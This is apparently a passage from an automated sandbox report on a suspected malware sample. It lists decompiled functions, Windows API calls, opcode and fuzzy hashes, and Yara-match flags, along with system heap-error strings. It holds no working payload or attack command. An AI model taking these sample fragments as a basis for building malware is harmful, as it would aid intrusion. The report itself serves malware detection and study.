                                                                                                        • Instruction Fuzzy Hash: CC90027220101802D2807159440468A0445D7D1341FD1C479A0015654DCA558AA9B7E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 764f03febf25950c4b17bc90a44ad3b1679e75e551fdd76726923998e8142769
                                                                                                        • Instruction ID: bf58ffaa9dac89db1f77da093f90f33ce7a0828b4be068a0f121a59a637e6e6f
                                                                                                        • Opcode Fuzzy Hash: 764f03febf25950c4b17bc90a44ad3b1679e75e551fdd76726923998e8142769
                                                                                                        • Instruction Fuzzy Hash: 5990026230101003D240715954186464445E7E1341F91D475E0404554CD95588A6A2A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b48a7390de83359ef2304fe5688021eb5c9ba7063452a418ca98125ff940a380
                                                                                                        • Instruction ID: df5cadbf504de8eeb48d1f10f33e75327495d7e611725e5cffbc1ca0a0c02521
                                                                                                        • Opcode Fuzzy Hash: b48a7390de83359ef2304fe5688021eb5c9ba7063452a418ca98125ff940a380
                                                                                                        • Instruction Fuzzy Hash: 5290026A21301002D2807159540864A0445D7D1342FD1D879A0005558CC95588B9A3A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: d5827b1735f348fe138de006f8b2a3e432374df33c76ad6262f4221309c3ae9f
                                                                                                        • Instruction ID: 189484e989f2f9f0dc86189e3b71d9647c3315315c8a2ef0530263dcd512f25a
                                                                                                        • Opcode Fuzzy Hash: d5827b1735f348fe138de006f8b2a3e432374df33c76ad6262f4221309c3ae9f
                                                                                                        • Instruction Fuzzy Hash: FD90027231115402D210615984047460445D7D1341F91C875A0814558D86D588E1B1A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 42d546b2ccde29aa5e9749d4c4ff1fcc8476105cbf3915c11236b692831b6886
                                                                                                        • Instruction ID: 27257288278f352b8005f91479d720a2627998e7adad8108b401328087ec486d
                                                                                                        • Opcode Fuzzy Hash: 42d546b2ccde29aa5e9749d4c4ff1fcc8476105cbf3915c11236b692831b6886
                                                                                                        • Instruction Fuzzy Hash: D790027220101402D200659954086860445D7E0341F91D475A5014555EC6A588E1B1B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                        • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                                                        • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                        • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407216, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82threadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 3333
                                                                                                        • API String ID: 1836367815-2924271548
                                                                                                        • Opcode ID: f011b1b14abb2c899324767d95c3c70cf4012d6aa4f3b90e243bb790e1cf0898
                                                                                                        • Instruction ID: 477763e6507905bedc25b0175b6d338320480d10003cf44e75c21978b6163200
                                                                                                        • Opcode Fuzzy Hash: f011b1b14abb2c899324767d95c3c70cf4012d6aa4f3b90e243bb790e1cf0898
                                                                                                        • Instruction Fuzzy Hash: 02110D32A402187BE725A7959C42FFF73689F00764F04446EFA08FB2C1E6696D0182DA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                                                        0x004184b7
                                                                                                        0x004184c2
                                                                                                        0x004184cd
                                                                                                        0x004184d1

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID: &5A
                                                                                                        • API String ID: 1279760036-1617645808
                                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                        • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                        • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836367815-0
                                                                                                        • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                        • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                                                        • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                        • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00418631, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3899507212-0
                                                                                                        • Opcode ID: 2b30993ab9c716d26f22845b938295efce3008fe707623aab83cbc48a161c47e
                                                                                                        • Instruction ID: 82cd63e2463ad781f8a145e8c7c4f183d1532e547ced5579eeee435662335699
                                                                                                        • Opcode Fuzzy Hash: 2b30993ab9c716d26f22845b938295efce3008fe707623aab83cbc48a161c47e
                                                                                                        • Instruction Fuzzy Hash: 7DE02BB26446402BEB10EF64DC80DE77FD8DF46260F148A5DF8CD4B142C830A50ACB70
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004184DB, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 34c4498f5aeb59cefb2c9f50f048e9bf9eab27a6472ba2318296842b0acd86ce
                                                                                                        • Instruction ID: 0c1fa8d0ffa07d40f29a3313d5d5cec68a52130d66132a62fb62f267417fc63d
                                                                                                        • Opcode Fuzzy Hash: 34c4498f5aeb59cefb2c9f50f048e9bf9eab27a6472ba2318296842b0acd86ce
                                                                                                        • Instruction Fuzzy Hash: 7EE09271204214AFDB24DF65CC85ED73768EF84350F014158FD0897281C631E910CBB0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                        • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                        • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3899507212-0
                                                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                        • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                        • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00418512, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 698e28d4905414893f8b07889fa13c72b86f9d27eeabc6fc63a77a55506ec286
                                                                                                        • Instruction ID: 45a7c3fa7ef7be6231b76f149941c2042c399a91cc78a0b8fe2eb8081b55882d
                                                                                                        • Opcode Fuzzy Hash: 698e28d4905414893f8b07889fa13c72b86f9d27eeabc6fc63a77a55506ec286
                                                                                                        • Instruction Fuzzy Hash: E0E086756002107FD721DF58CC85FD77B95EF88350F15846DB959AB381C574DA01CAE0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                        • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                        • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 424f4f133fe453ac66af71338374aa6cb7abd6c8b4f389559a926cdab47b8979
                                                                                                        • Instruction ID: 5b45f96903b48efb9dc96b9fda9118729d0157ae8931af36ebf00e1b15ddb41e
                                                                                                        • Opcode Fuzzy Hash: 424f4f133fe453ac66af71338374aa6cb7abd6c8b4f389559a926cdab47b8979
                                                                                                        • Instruction Fuzzy Hash: 48B09B729014D5C5D711D76046087177D40F7D0741F56C5B5D1020645B4779C4D1F5F5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00B7B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00B7B2F3
                                                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B7B38F
                                                                                                        • *** enter .exr %p for the exception record, xrefs: 00B7B4F1
                                                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 00B7B352
                                                                                                        • <unknown>, xrefs: 00B7B27E, 00B7B2D1, 00B7B350, 00B7B399, 00B7B417, 00B7B48E
                                                                                                        • *** then kb to get the faulting stack, xrefs: 00B7B51C
                                                                                                        • an invalid address, %p, xrefs: 00B7B4CF
                                                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B7B53F
                                                                                                        • read from, xrefs: 00B7B4AD, 00B7B4B2
                                                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B7B323
                                                                                                        • The instruction at %p referenced memory at %p., xrefs: 00B7B432
                                                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 00B7B48F
                                                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B7B314
                                                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B7B476
                                                                                                        • Go determine why that thread has not released the critical section., xrefs: 00B7B3C5
                                                                                                        • *** Inpage error in %ws:%s, xrefs: 00B7B418
                                                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B7B2DC
                                                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B7B3D6
                                                                                                        • write to, xrefs: 00B7B4A6
                                                                                                        • The resource is owned shared by %d threads, xrefs: 00B7B37E
                                                                                                        • The instruction at %p tried to %s , xrefs: 00B7B4B6
                                                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B7B39B
                                                                                                        • This failed because of error %Ix., xrefs: 00B7B446
                                                                                                        • The resource is owned exclusively by thread %p, xrefs: 00B7B374
                                                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B7B305
                                                                                                        • The critical section is owned by thread %p., xrefs: 00B7B3B9
                                                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B7B47D
                                                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B7B484
                                                                                                        • *** enter .cxr %p for the context, xrefs: 00B7B50D
                                                                                                        • a NULL pointer, xrefs: 00B7B4E0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                        • API String ID: 0-108210295
                                                                                                        • Opcode ID: 186755f738bf0885b16ffd69210e5120df8614ee3941d143227bd3db26847f2a
                                                                                                        • Instruction ID: 7171acbde1078a00f1937f922c4e886351845f1e7a3048674b27ec2a889db987
                                                                                                        • Opcode Fuzzy Hash: 186755f738bf0885b16ffd69210e5120df8614ee3941d143227bd3db26847f2a
                                                                                                        • Instruction Fuzzy Hash: 7C81F435A00200FFCB256A158C96FBB3FA9EF5AB52F4180D4F4192B253E3719951DB72
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B81C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00B81C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xaa48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00ACB150();
				} else {
					E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xbb589c);
				E00ACB150("Heap error detected at %p (heap handle %p)\n",  *0xbb58a0);
				_t27 =  *0xbb5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00B81E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00ACB150();
				} else {
					E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00ACB150("Error code: %d - %s\n",  *0xbb5898);
				_t113 =  *0xbb58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00ACB150();
					} else {
						E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00ACB150("Parameter1: %p\n",  *0xbb58a4);
				}
				_t115 =  *0xbb58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00ACB150();
					} else {
						E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00ACB150("Parameter2: %p\n",  *0xbb58a8);
				}
				_t117 =  *0xbb58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00ACB150();
					} else {
						E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00ACB150("Parameter3: %p\n",  *0xbb58ac);
				}
				_t119 =  *0xbb58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00ACB150();
					} else {
						E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xbb58b4);
					E00ACB150("Last known valid blocks: before - %p, after - %p\n",  *0xbb58b0);
				} else {
					_t120 =  *0xbb58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00ACB150();
				} else {
					E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00ACB150("Stack trace available at %p\n", 0xbb58c0);
			}











                                                                                                        0x00b81c10
                                                                                                        0x00b81c16
                                                                                                        0x00b81c1e
                                                                                                        0x00b81c3d
                                                                                                        0x00b81c3e
                                                                                                        0x00b81c20
                                                                                                        0x00b81c35
                                                                                                        0x00b81c3a
                                                                                                        0x00b81c44
                                                                                                        0x00b81c55
                                                                                                        0x00b81c5a
                                                                                                        0x00b81c65
                                                                                                        0x00b81c67
                                                                                                        0x00000000
                                                                                                        0x00b81c6e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b81c67
                                                                                                        0x00b81cdc
                                                                                                        0x00b81ce5
                                                                                                        0x00b81d04
                                                                                                        0x00b81d05
                                                                                                        0x00b81ce7
                                                                                                        0x00b81cfc
                                                                                                        0x00b81d01
                                                                                                        0x00b81d0b
                                                                                                        0x00b81d17
                                                                                                        0x00b81d1f
                                                                                                        0x00b81d25
                                                                                                        0x00b81d30
                                                                                                        0x00b81d4f
                                                                                                        0x00b81d50
                                                                                                        0x00b81d32
                                                                                                        0x00b81d47
                                                                                                        0x00b81d4c
                                                                                                        0x00b81d61
                                                                                                        0x00b81d67
                                                                                                        0x00b81d68
                                                                                                        0x00b81d6e
                                                                                                        0x00b81d79
                                                                                                        0x00b81d98
                                                                                                        0x00b81d99
                                                                                                        0x00b81d7b
                                                                                                        0x00b81d90
                                                                                                        0x00b81d95
                                                                                                        0x00b81daa
                                                                                                        0x00b81db0
                                                                                                        0x00b81db1
                                                                                                        0x00b81db7
                                                                                                        0x00b81dc2
                                                                                                        0x00b81de1
                                                                                                        0x00b81de2
                                                                                                        0x00b81dc4
                                                                                                        0x00b81dd9
                                                                                                        0x00b81dde
                                                                                                        0x00b81df3
                                                                                                        0x00b81df9
                                                                                                        0x00b81dfa
                                                                                                        0x00b81e00
                                                                                                        0x00b81e0a
                                                                                                        0x00b81e13
                                                                                                        0x00b81e32
                                                                                                        0x00b81e33
                                                                                                        0x00b81e15
                                                                                                        0x00b81e2a
                                                                                                        0x00b81e2f
                                                                                                        0x00b81e39
                                                                                                        0x00b81e4a
                                                                                                        0x00b81e02
                                                                                                        0x00b81e02
                                                                                                        0x00b81e08
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b81e08
                                                                                                        0x00b81e5b
                                                                                                        0x00b81e7a
                                                                                                        0x00b81e7b
                                                                                                        0x00b81e5d
                                                                                                        0x00b81e72
                                                                                                        0x00b81e77
                                                                                                        0x00b81e95

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                        • API String ID: 0-2897834094
